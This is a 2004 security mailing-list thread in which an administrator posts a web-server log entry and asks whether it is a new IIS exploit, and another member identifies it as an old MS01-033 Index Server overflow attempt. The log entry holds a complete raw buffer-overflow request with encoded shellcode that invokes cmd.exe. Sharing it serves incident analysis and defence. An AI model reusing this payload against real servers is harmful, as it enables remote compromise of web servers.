Security Incidents mailing list archives

RE: new IIS exploit?

From: "Alan Melia (Melmac)" <alanme () melmac co uk>
Date: Sat, 31 Jan 2004 18:33:25 -0000
Don't think so.  Just someone trying an old one...

MS01-033: Unchecked Buffer in Index Server ISAPI Extension Can Enable Web
Server Compromise
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp

URLSCAN will block this stuff.

Alan Melia

Melmac Solutions Ltd.

http://www.melmac.co.uk

 

-----Original Message-----
From: Alejandro Flores [mailto:alejandro.flores () triforsec com br] 
Sent: 30 January 2004 14:38
To: incidents () securityfocus com
Subject: new IIS exploit?

        Hello there,

        Anyone have seen this entry?

xx.xxx.xxx.xx - - [27/Jan/2004:17:51:57 -0300] "GET
/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u
0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\
x90\x90\xeb\t\x90\x90\x90_\xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0\x8
d}-\x90\x90\x90\x8b\xf7f\xb8H\x063\xc9f\x8b\xc8\xb4\x99\xfc\xac2\xc4\xaa\xe2
\xfa\x14$\xec\x9f\x99\x99e\xaaP(\xb9)\xbdk7_\xdef\x99q\x94\x9d\x99\x99q\x16\
x9d\x99\x99q\xd7\x9b\x99\x99\x10\x1c\xda\x9c\x99\x99q\xc8\x9b\x99\x99q\xbd\x
9a\x99\x99\x10\x1c\xde\x9c\x99\x99q'\x98\x99\x99\x10\x1c\xd6\x9c\x99\x99\x12
\x1c\xde\x9c\x99\x99q\xe6\x9b\x99\x99\x10\x1c\xd2\x9c\x99\x99q\xc7\x99\x99\x
99q\b\x99\x99\x99\x1aa\x99\xedy\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x94\x9f\x99
\x99\x12\x1c\xde\x9c\x99\x99\xc9f\x0c\x94\x9f\x99\x99\x12\x1c\xb6\x9c\x99\x9
9\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xa2\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99!
\x99\x99\x99\x99\xc9\x12\x1c\xd6\x9c\x99\x99\xc9f\x0c\\\x9c\x99\x99!\x99\x99
\x99\x99\xc9f\x0cO\x9c\x99\x99Z\x12\x1c\xd2\x9c\x99\x99\xf3\x99\xf3\x80\x14\
x1c\x9a\x98\x99\x99\xc9\x12\x1c\xd2\x9c\x99\x99\xc9f\x0c\x9a\x9f\x99\x99Z\x9
4\x93\xce\xf0\xf7\xf7\xed\xd8\xec\xed\xf6\xd8\xed\xed\xf8\xfa\xf2\xb9\xcf\xa
b\xa9\x94\x93\x94\x93\xf1\t\x99\x99\x99f\x0c&\x9c\x99\x99\x12\x1c\xb6\x9c\x9
9\x99q_\x99\x99\x99\x1aaf\x96\x1d/\x99\x99\x99\x1aa\x99\xed\xce\t\t\t\t\xf3\
x99\x14\x1c\xa6\x9c\x99\x99\xc9\xf1\x99\x9d\x99\x99\x12\x1c\xda\x9c\x99\x99\
xc9\x12\x1c\xb6\x9c\x99\x99\xc9f\x0c/\x9c\x99\x99\x1aa\x99\x96\x1d\x1b\x99\x
99\x99\xf3\x99\x12\x1c\xa6\x9c\x99\x99\xc9\x12\x1c\xda\x9c\x99\x99\xc9\x12\x
1c\xd2\x9c\x99\x99\xc9f\x0c\x9a\x9f\x99\x99\x1aaf\xed\xfd\t\t\t\tr\x1c\xf3\x
99\xf1\x99\x9d\x99\x99\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xd2\x9c\x99\x99\x
c9f\x0c\x91\x9f\x99\x99\x1aa\x99\xed\xa7\t\t\t\t\x1aaf\xed\xac\t\t\t\t\xaaB\
xca\x14\x04\xa6\x9c\x99\x99\xca\xc9\x12\x1c\xda\x9c\x99\x99\xc9\x12\x1c\xa2\
x9c\x99\x99\xc9f\x0c5\x9c\x99\x99\x1aa\x99\xed\x90\t\t\t\tp\xb2fff\xaaY\xd1Z
\xaaYZ\xaaB\xca\x14\x04\xbd\x9b\x99\x99\xca\xaaB\xca\xca\xca\xc9f\x0c\v\x9c\
x99\x99\x1aa\x99\xed\x92\t\t\t\t\x12\x1c\xbd\x9b\x99\x99Z!ffffZ\x99\x99\x99\
x99\x12\x1c\xda\x9c\x99\x99^\x99\xdd\x99\x99\x99\xc9f\x0c\xfe\x9c\x99\x99\x1
2\x04\xda\x9c\x99\x99\x12\x1c\xaa\x9c\x99\x99\x10\xda\xd9\x10\xda\xa5\x12\x1
c\xae\x9c\x99\x99\x10\xda\xa1!\x98\x98\x99\x99\x10\xda\xb5\xca\xca\xaaY\xc9\
xc9\xc9\xd9\xc9\xd1\xc9\xc9\x14\x1c\xec\x9f\x99\x99\xc9\xaaY\xc9f\x0c\xee\x9
c\x99\x99\x12\x1c\xaa\x9c\x99\x99\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xae\x9c\x
99\x99\xc9f\x0c\x1f\x9c\x99\x99\x12\x1c\xda\x9c\x99\x99\x12\x99Z\xf1\x99\x9d
\x99\x99\xf3\xd9f\x0c9\x9c\x99\x99Z\xaaY\xc9\x14\x1cw\x9b\x99\x99^\x99\x95\x
99\x99\x99\xc9\x14\x1c\xaa\x9c\x99\x99\xc9\x14\x1c\xb6\x9c\x99\x99\xc9f\x0c\
xc5\x9c\x99\x99\xaaY\xc9\x14\x1cw\x9b\x99\x99\xc9\x14\x1c\xa2\x9c\x99\x99\xc
9\x14\x1c\xae\x9c\x99\x99\xc9f\x0c\xc5\x9c\x99\x99Z\x99\x99\x99\x99\x99\x99\
x99\x99\x98\x99\x99\x99\xc9\x14\x04\xb8\x9a\x99\x99^\x9a\x89\x99\x99\x99\xca
\x14\x04\xdb\x9d\x99\x99\xca\xc9f\x0ce\x9c\x99\x99\x12A\x1aa\x99\xc1\xe5E\x1
2ZZ\x89\x99\x99\x99\xf3\x8a\x14\x1c\xf6\x9a\x99\x99\xc9f\x0c\xbd\x9f\x99\x99
\x14\x1c\xf6\x9a\x99\x99\xc9f\x0c\xa9\x9f\x99\x99\x1aa\x99\xed\xbb\t\t\t\t\x
12\xe9\x95\x12ge4\x1aa\x99\xed\x8a\t\t\t\t\x12\x99\xa5\x93\xedi\xa5Y\xedu\xa
55\xedqZ\x12n4\x12\x99Z\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\
x99\x99\x99\x99\x99\x99\x99\x12\x1c\xda\x9c\x99\x99\xc9\xf3\x9bf\x0c\x80\x9f
\x99\x99\xf3\x99\xf3\x98\xf3\x9bf\x0cp\x9c\x99\x99\x1aaf\x96\x1d\x01\x99\x99
\x99\x10\x1c\xde\x9c\x99\x99\x14\x04\xa6\x9c\x99\x99^\x9a\x98\x99\x99\x99\xf
3\x9d\xca\xf3\x9d\xf1ff\x99\x99\xc9f\x0c\xa7\x9f\x99\x99\x1aa\x99\xec\xe9\t\
t\t\t\xff\x12\x1c\xf6\x9f\x99\x99\xff\x10\x1c\xdd\x9d\x99\x99\x12\x1c\xe8\x9
f\x99\x99\x10\x1c\xdf\x9d\x99\x99\x1aaf\xec\x96\t\t\t\tq\xb3fff\x10\x1c\xdf\
x9d\x99\x99\x12\x1c\xde\x9c\x99\x99\xf3\x89\x14\x04\xdb\x9d\x99\x99\xca\xc9f
\x0ci\x9c\x99\x99\x1aa\x99\xec\xba\t\t\t\t\xf3\x9c\x12\x1c\xde\x9c\x99\x99\x
c9f\x0cl\x9c\x99\x99\x1aa\x99\xec\x92\t\t\t\t\x12\x1c\xde\x9c\x99\x99Z\xaaYZ
\x9b\x99\x99\xfa\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99!\x99\x99h\x
ee\x18\xa1\xd4\xc3\t\x99\xed\x9e\t\t\t\t\xd1rh\x12A\x12\xea\xa5\x9aj\x12\xef
\xe1\x9aj\x12\xe7\xb9\x9ab\x12\xd7\x8d\xaaK\xcf\xce\xc8\x12\xa6\x9ab\x14,\xc
1\x9f\x99\x99\xaaP(\x9ej\xff>\xed\x95\t\t\t\t\xc0\xc6\x1a^\x9d\xdb{F\xc0\xc6
\xc7\x12S\x12\xdf\xbd\x9aZHx\x9aX\xaaP\xff\x12\x91\x12\xdf\x85\x9aZXx\x9b\x9
aX\x12\x99\x9aZ\x10\x1c\xf2\x9f\x99\x99\x12Z\x14\x04\xd2\x9f\x99\x99q\xc9\x9
9\x99\x99\x10\x1c\xfe\x9f\x99\x99Z\x14$\xca\x9c\x99\x99\x12^\xceq\xb6\x99\x9
9\x99\xc6\xc9\xabY\xaaPnHek7\xc1\x19\xa6\x99\xed\x8e\t\t\t\t\xc9\xce\x12Fq\x
84\x99\x99\x99\xc6\x10\x9e\xc1\xde\xde\xde\xder@\xde\x19\xa6\x99\xecSZ\xca\x
14\x04\xfe\x9f\x99\x99\xc9f\x8a\xc2Z\xce\x14$\xf2\x9f\x99\x99\xca\xc9f\x8e\x
c6Z\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\
x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\xd2\
xdc\xcb\xd7\xdc\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc\x99\
xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff\xf6\xd8\x99\xda\xeb\xfc\
xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\xd8\x99\xda\xf5\xf6\xea\xfc\xd1\xf8\
xf7\xfd\xf5\xfc\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9\xf0\xe9\xfc\x99\
xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6\xfa\x99\xce\xeb\xf0\xed\xfc\xdf\xf0\
xf5\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xcd\
xfc\xeb\xf4\xf0\xf7\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xdc\xe1\xf0\
xed\xcd\xf1\xeb\xfc\xf8\xfd\x99\x99\xce\xca\xab\xc6\xaa\xab\x99\xea\xf6\xfa\
xf2\xfc\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\
xfc\xe9\xed\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6\xea\xfc\
xea\xf6\xfa\xf2\xfc\xed\x99\xce\xca\xd8\xca\xed\xf8\xeb\xed\xec\xe9\x99\xfe\
xfc\xed\xf1\xf6\xea\xed\xf7\xf8\xf4\xfc\x99\xfe\xfc\xed\xf1\xf6\xea\xed\xfb\
xe0\xf7\xf8\xf4\xfc\x99\xea\xfc\xed\xea\xf6\xfa\xf2\xf6\xe9\xed\x99\x99\x99\
xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xde\xfc\xed\xc9\xeb\xf6\
xfa\xd8\xfd\xfd\xeb\xfc\xea\xea\x99\xea\xeb\x7f\xee\xa8\xe9\x7f\xee\x99\xfaQ
@\xe1\xbecmd.exe$ HTTP/1.1" 404 1045 "-" "-"

Regards,
Alejandro Flores




--TriForSec
http://www.triforsec.com.br/ 



---------------------------------------------------------------------------
----------------------------------------------------------------------------
Current thread:

Re: new IIS exploit? Russell J. Lahti (Feb 02)
- <Possible follow-ups>
- RE: new IIS exploit? Alan Melia (Melmac) (Feb 02)
- Re: new IIS exploit? Jamie Pratt (Feb 02)
  - RE: new IIS exploit? Sarbjit Singh Gill (Feb 03)
- RE: new IIS exploit? David LeBlanc (Feb 10)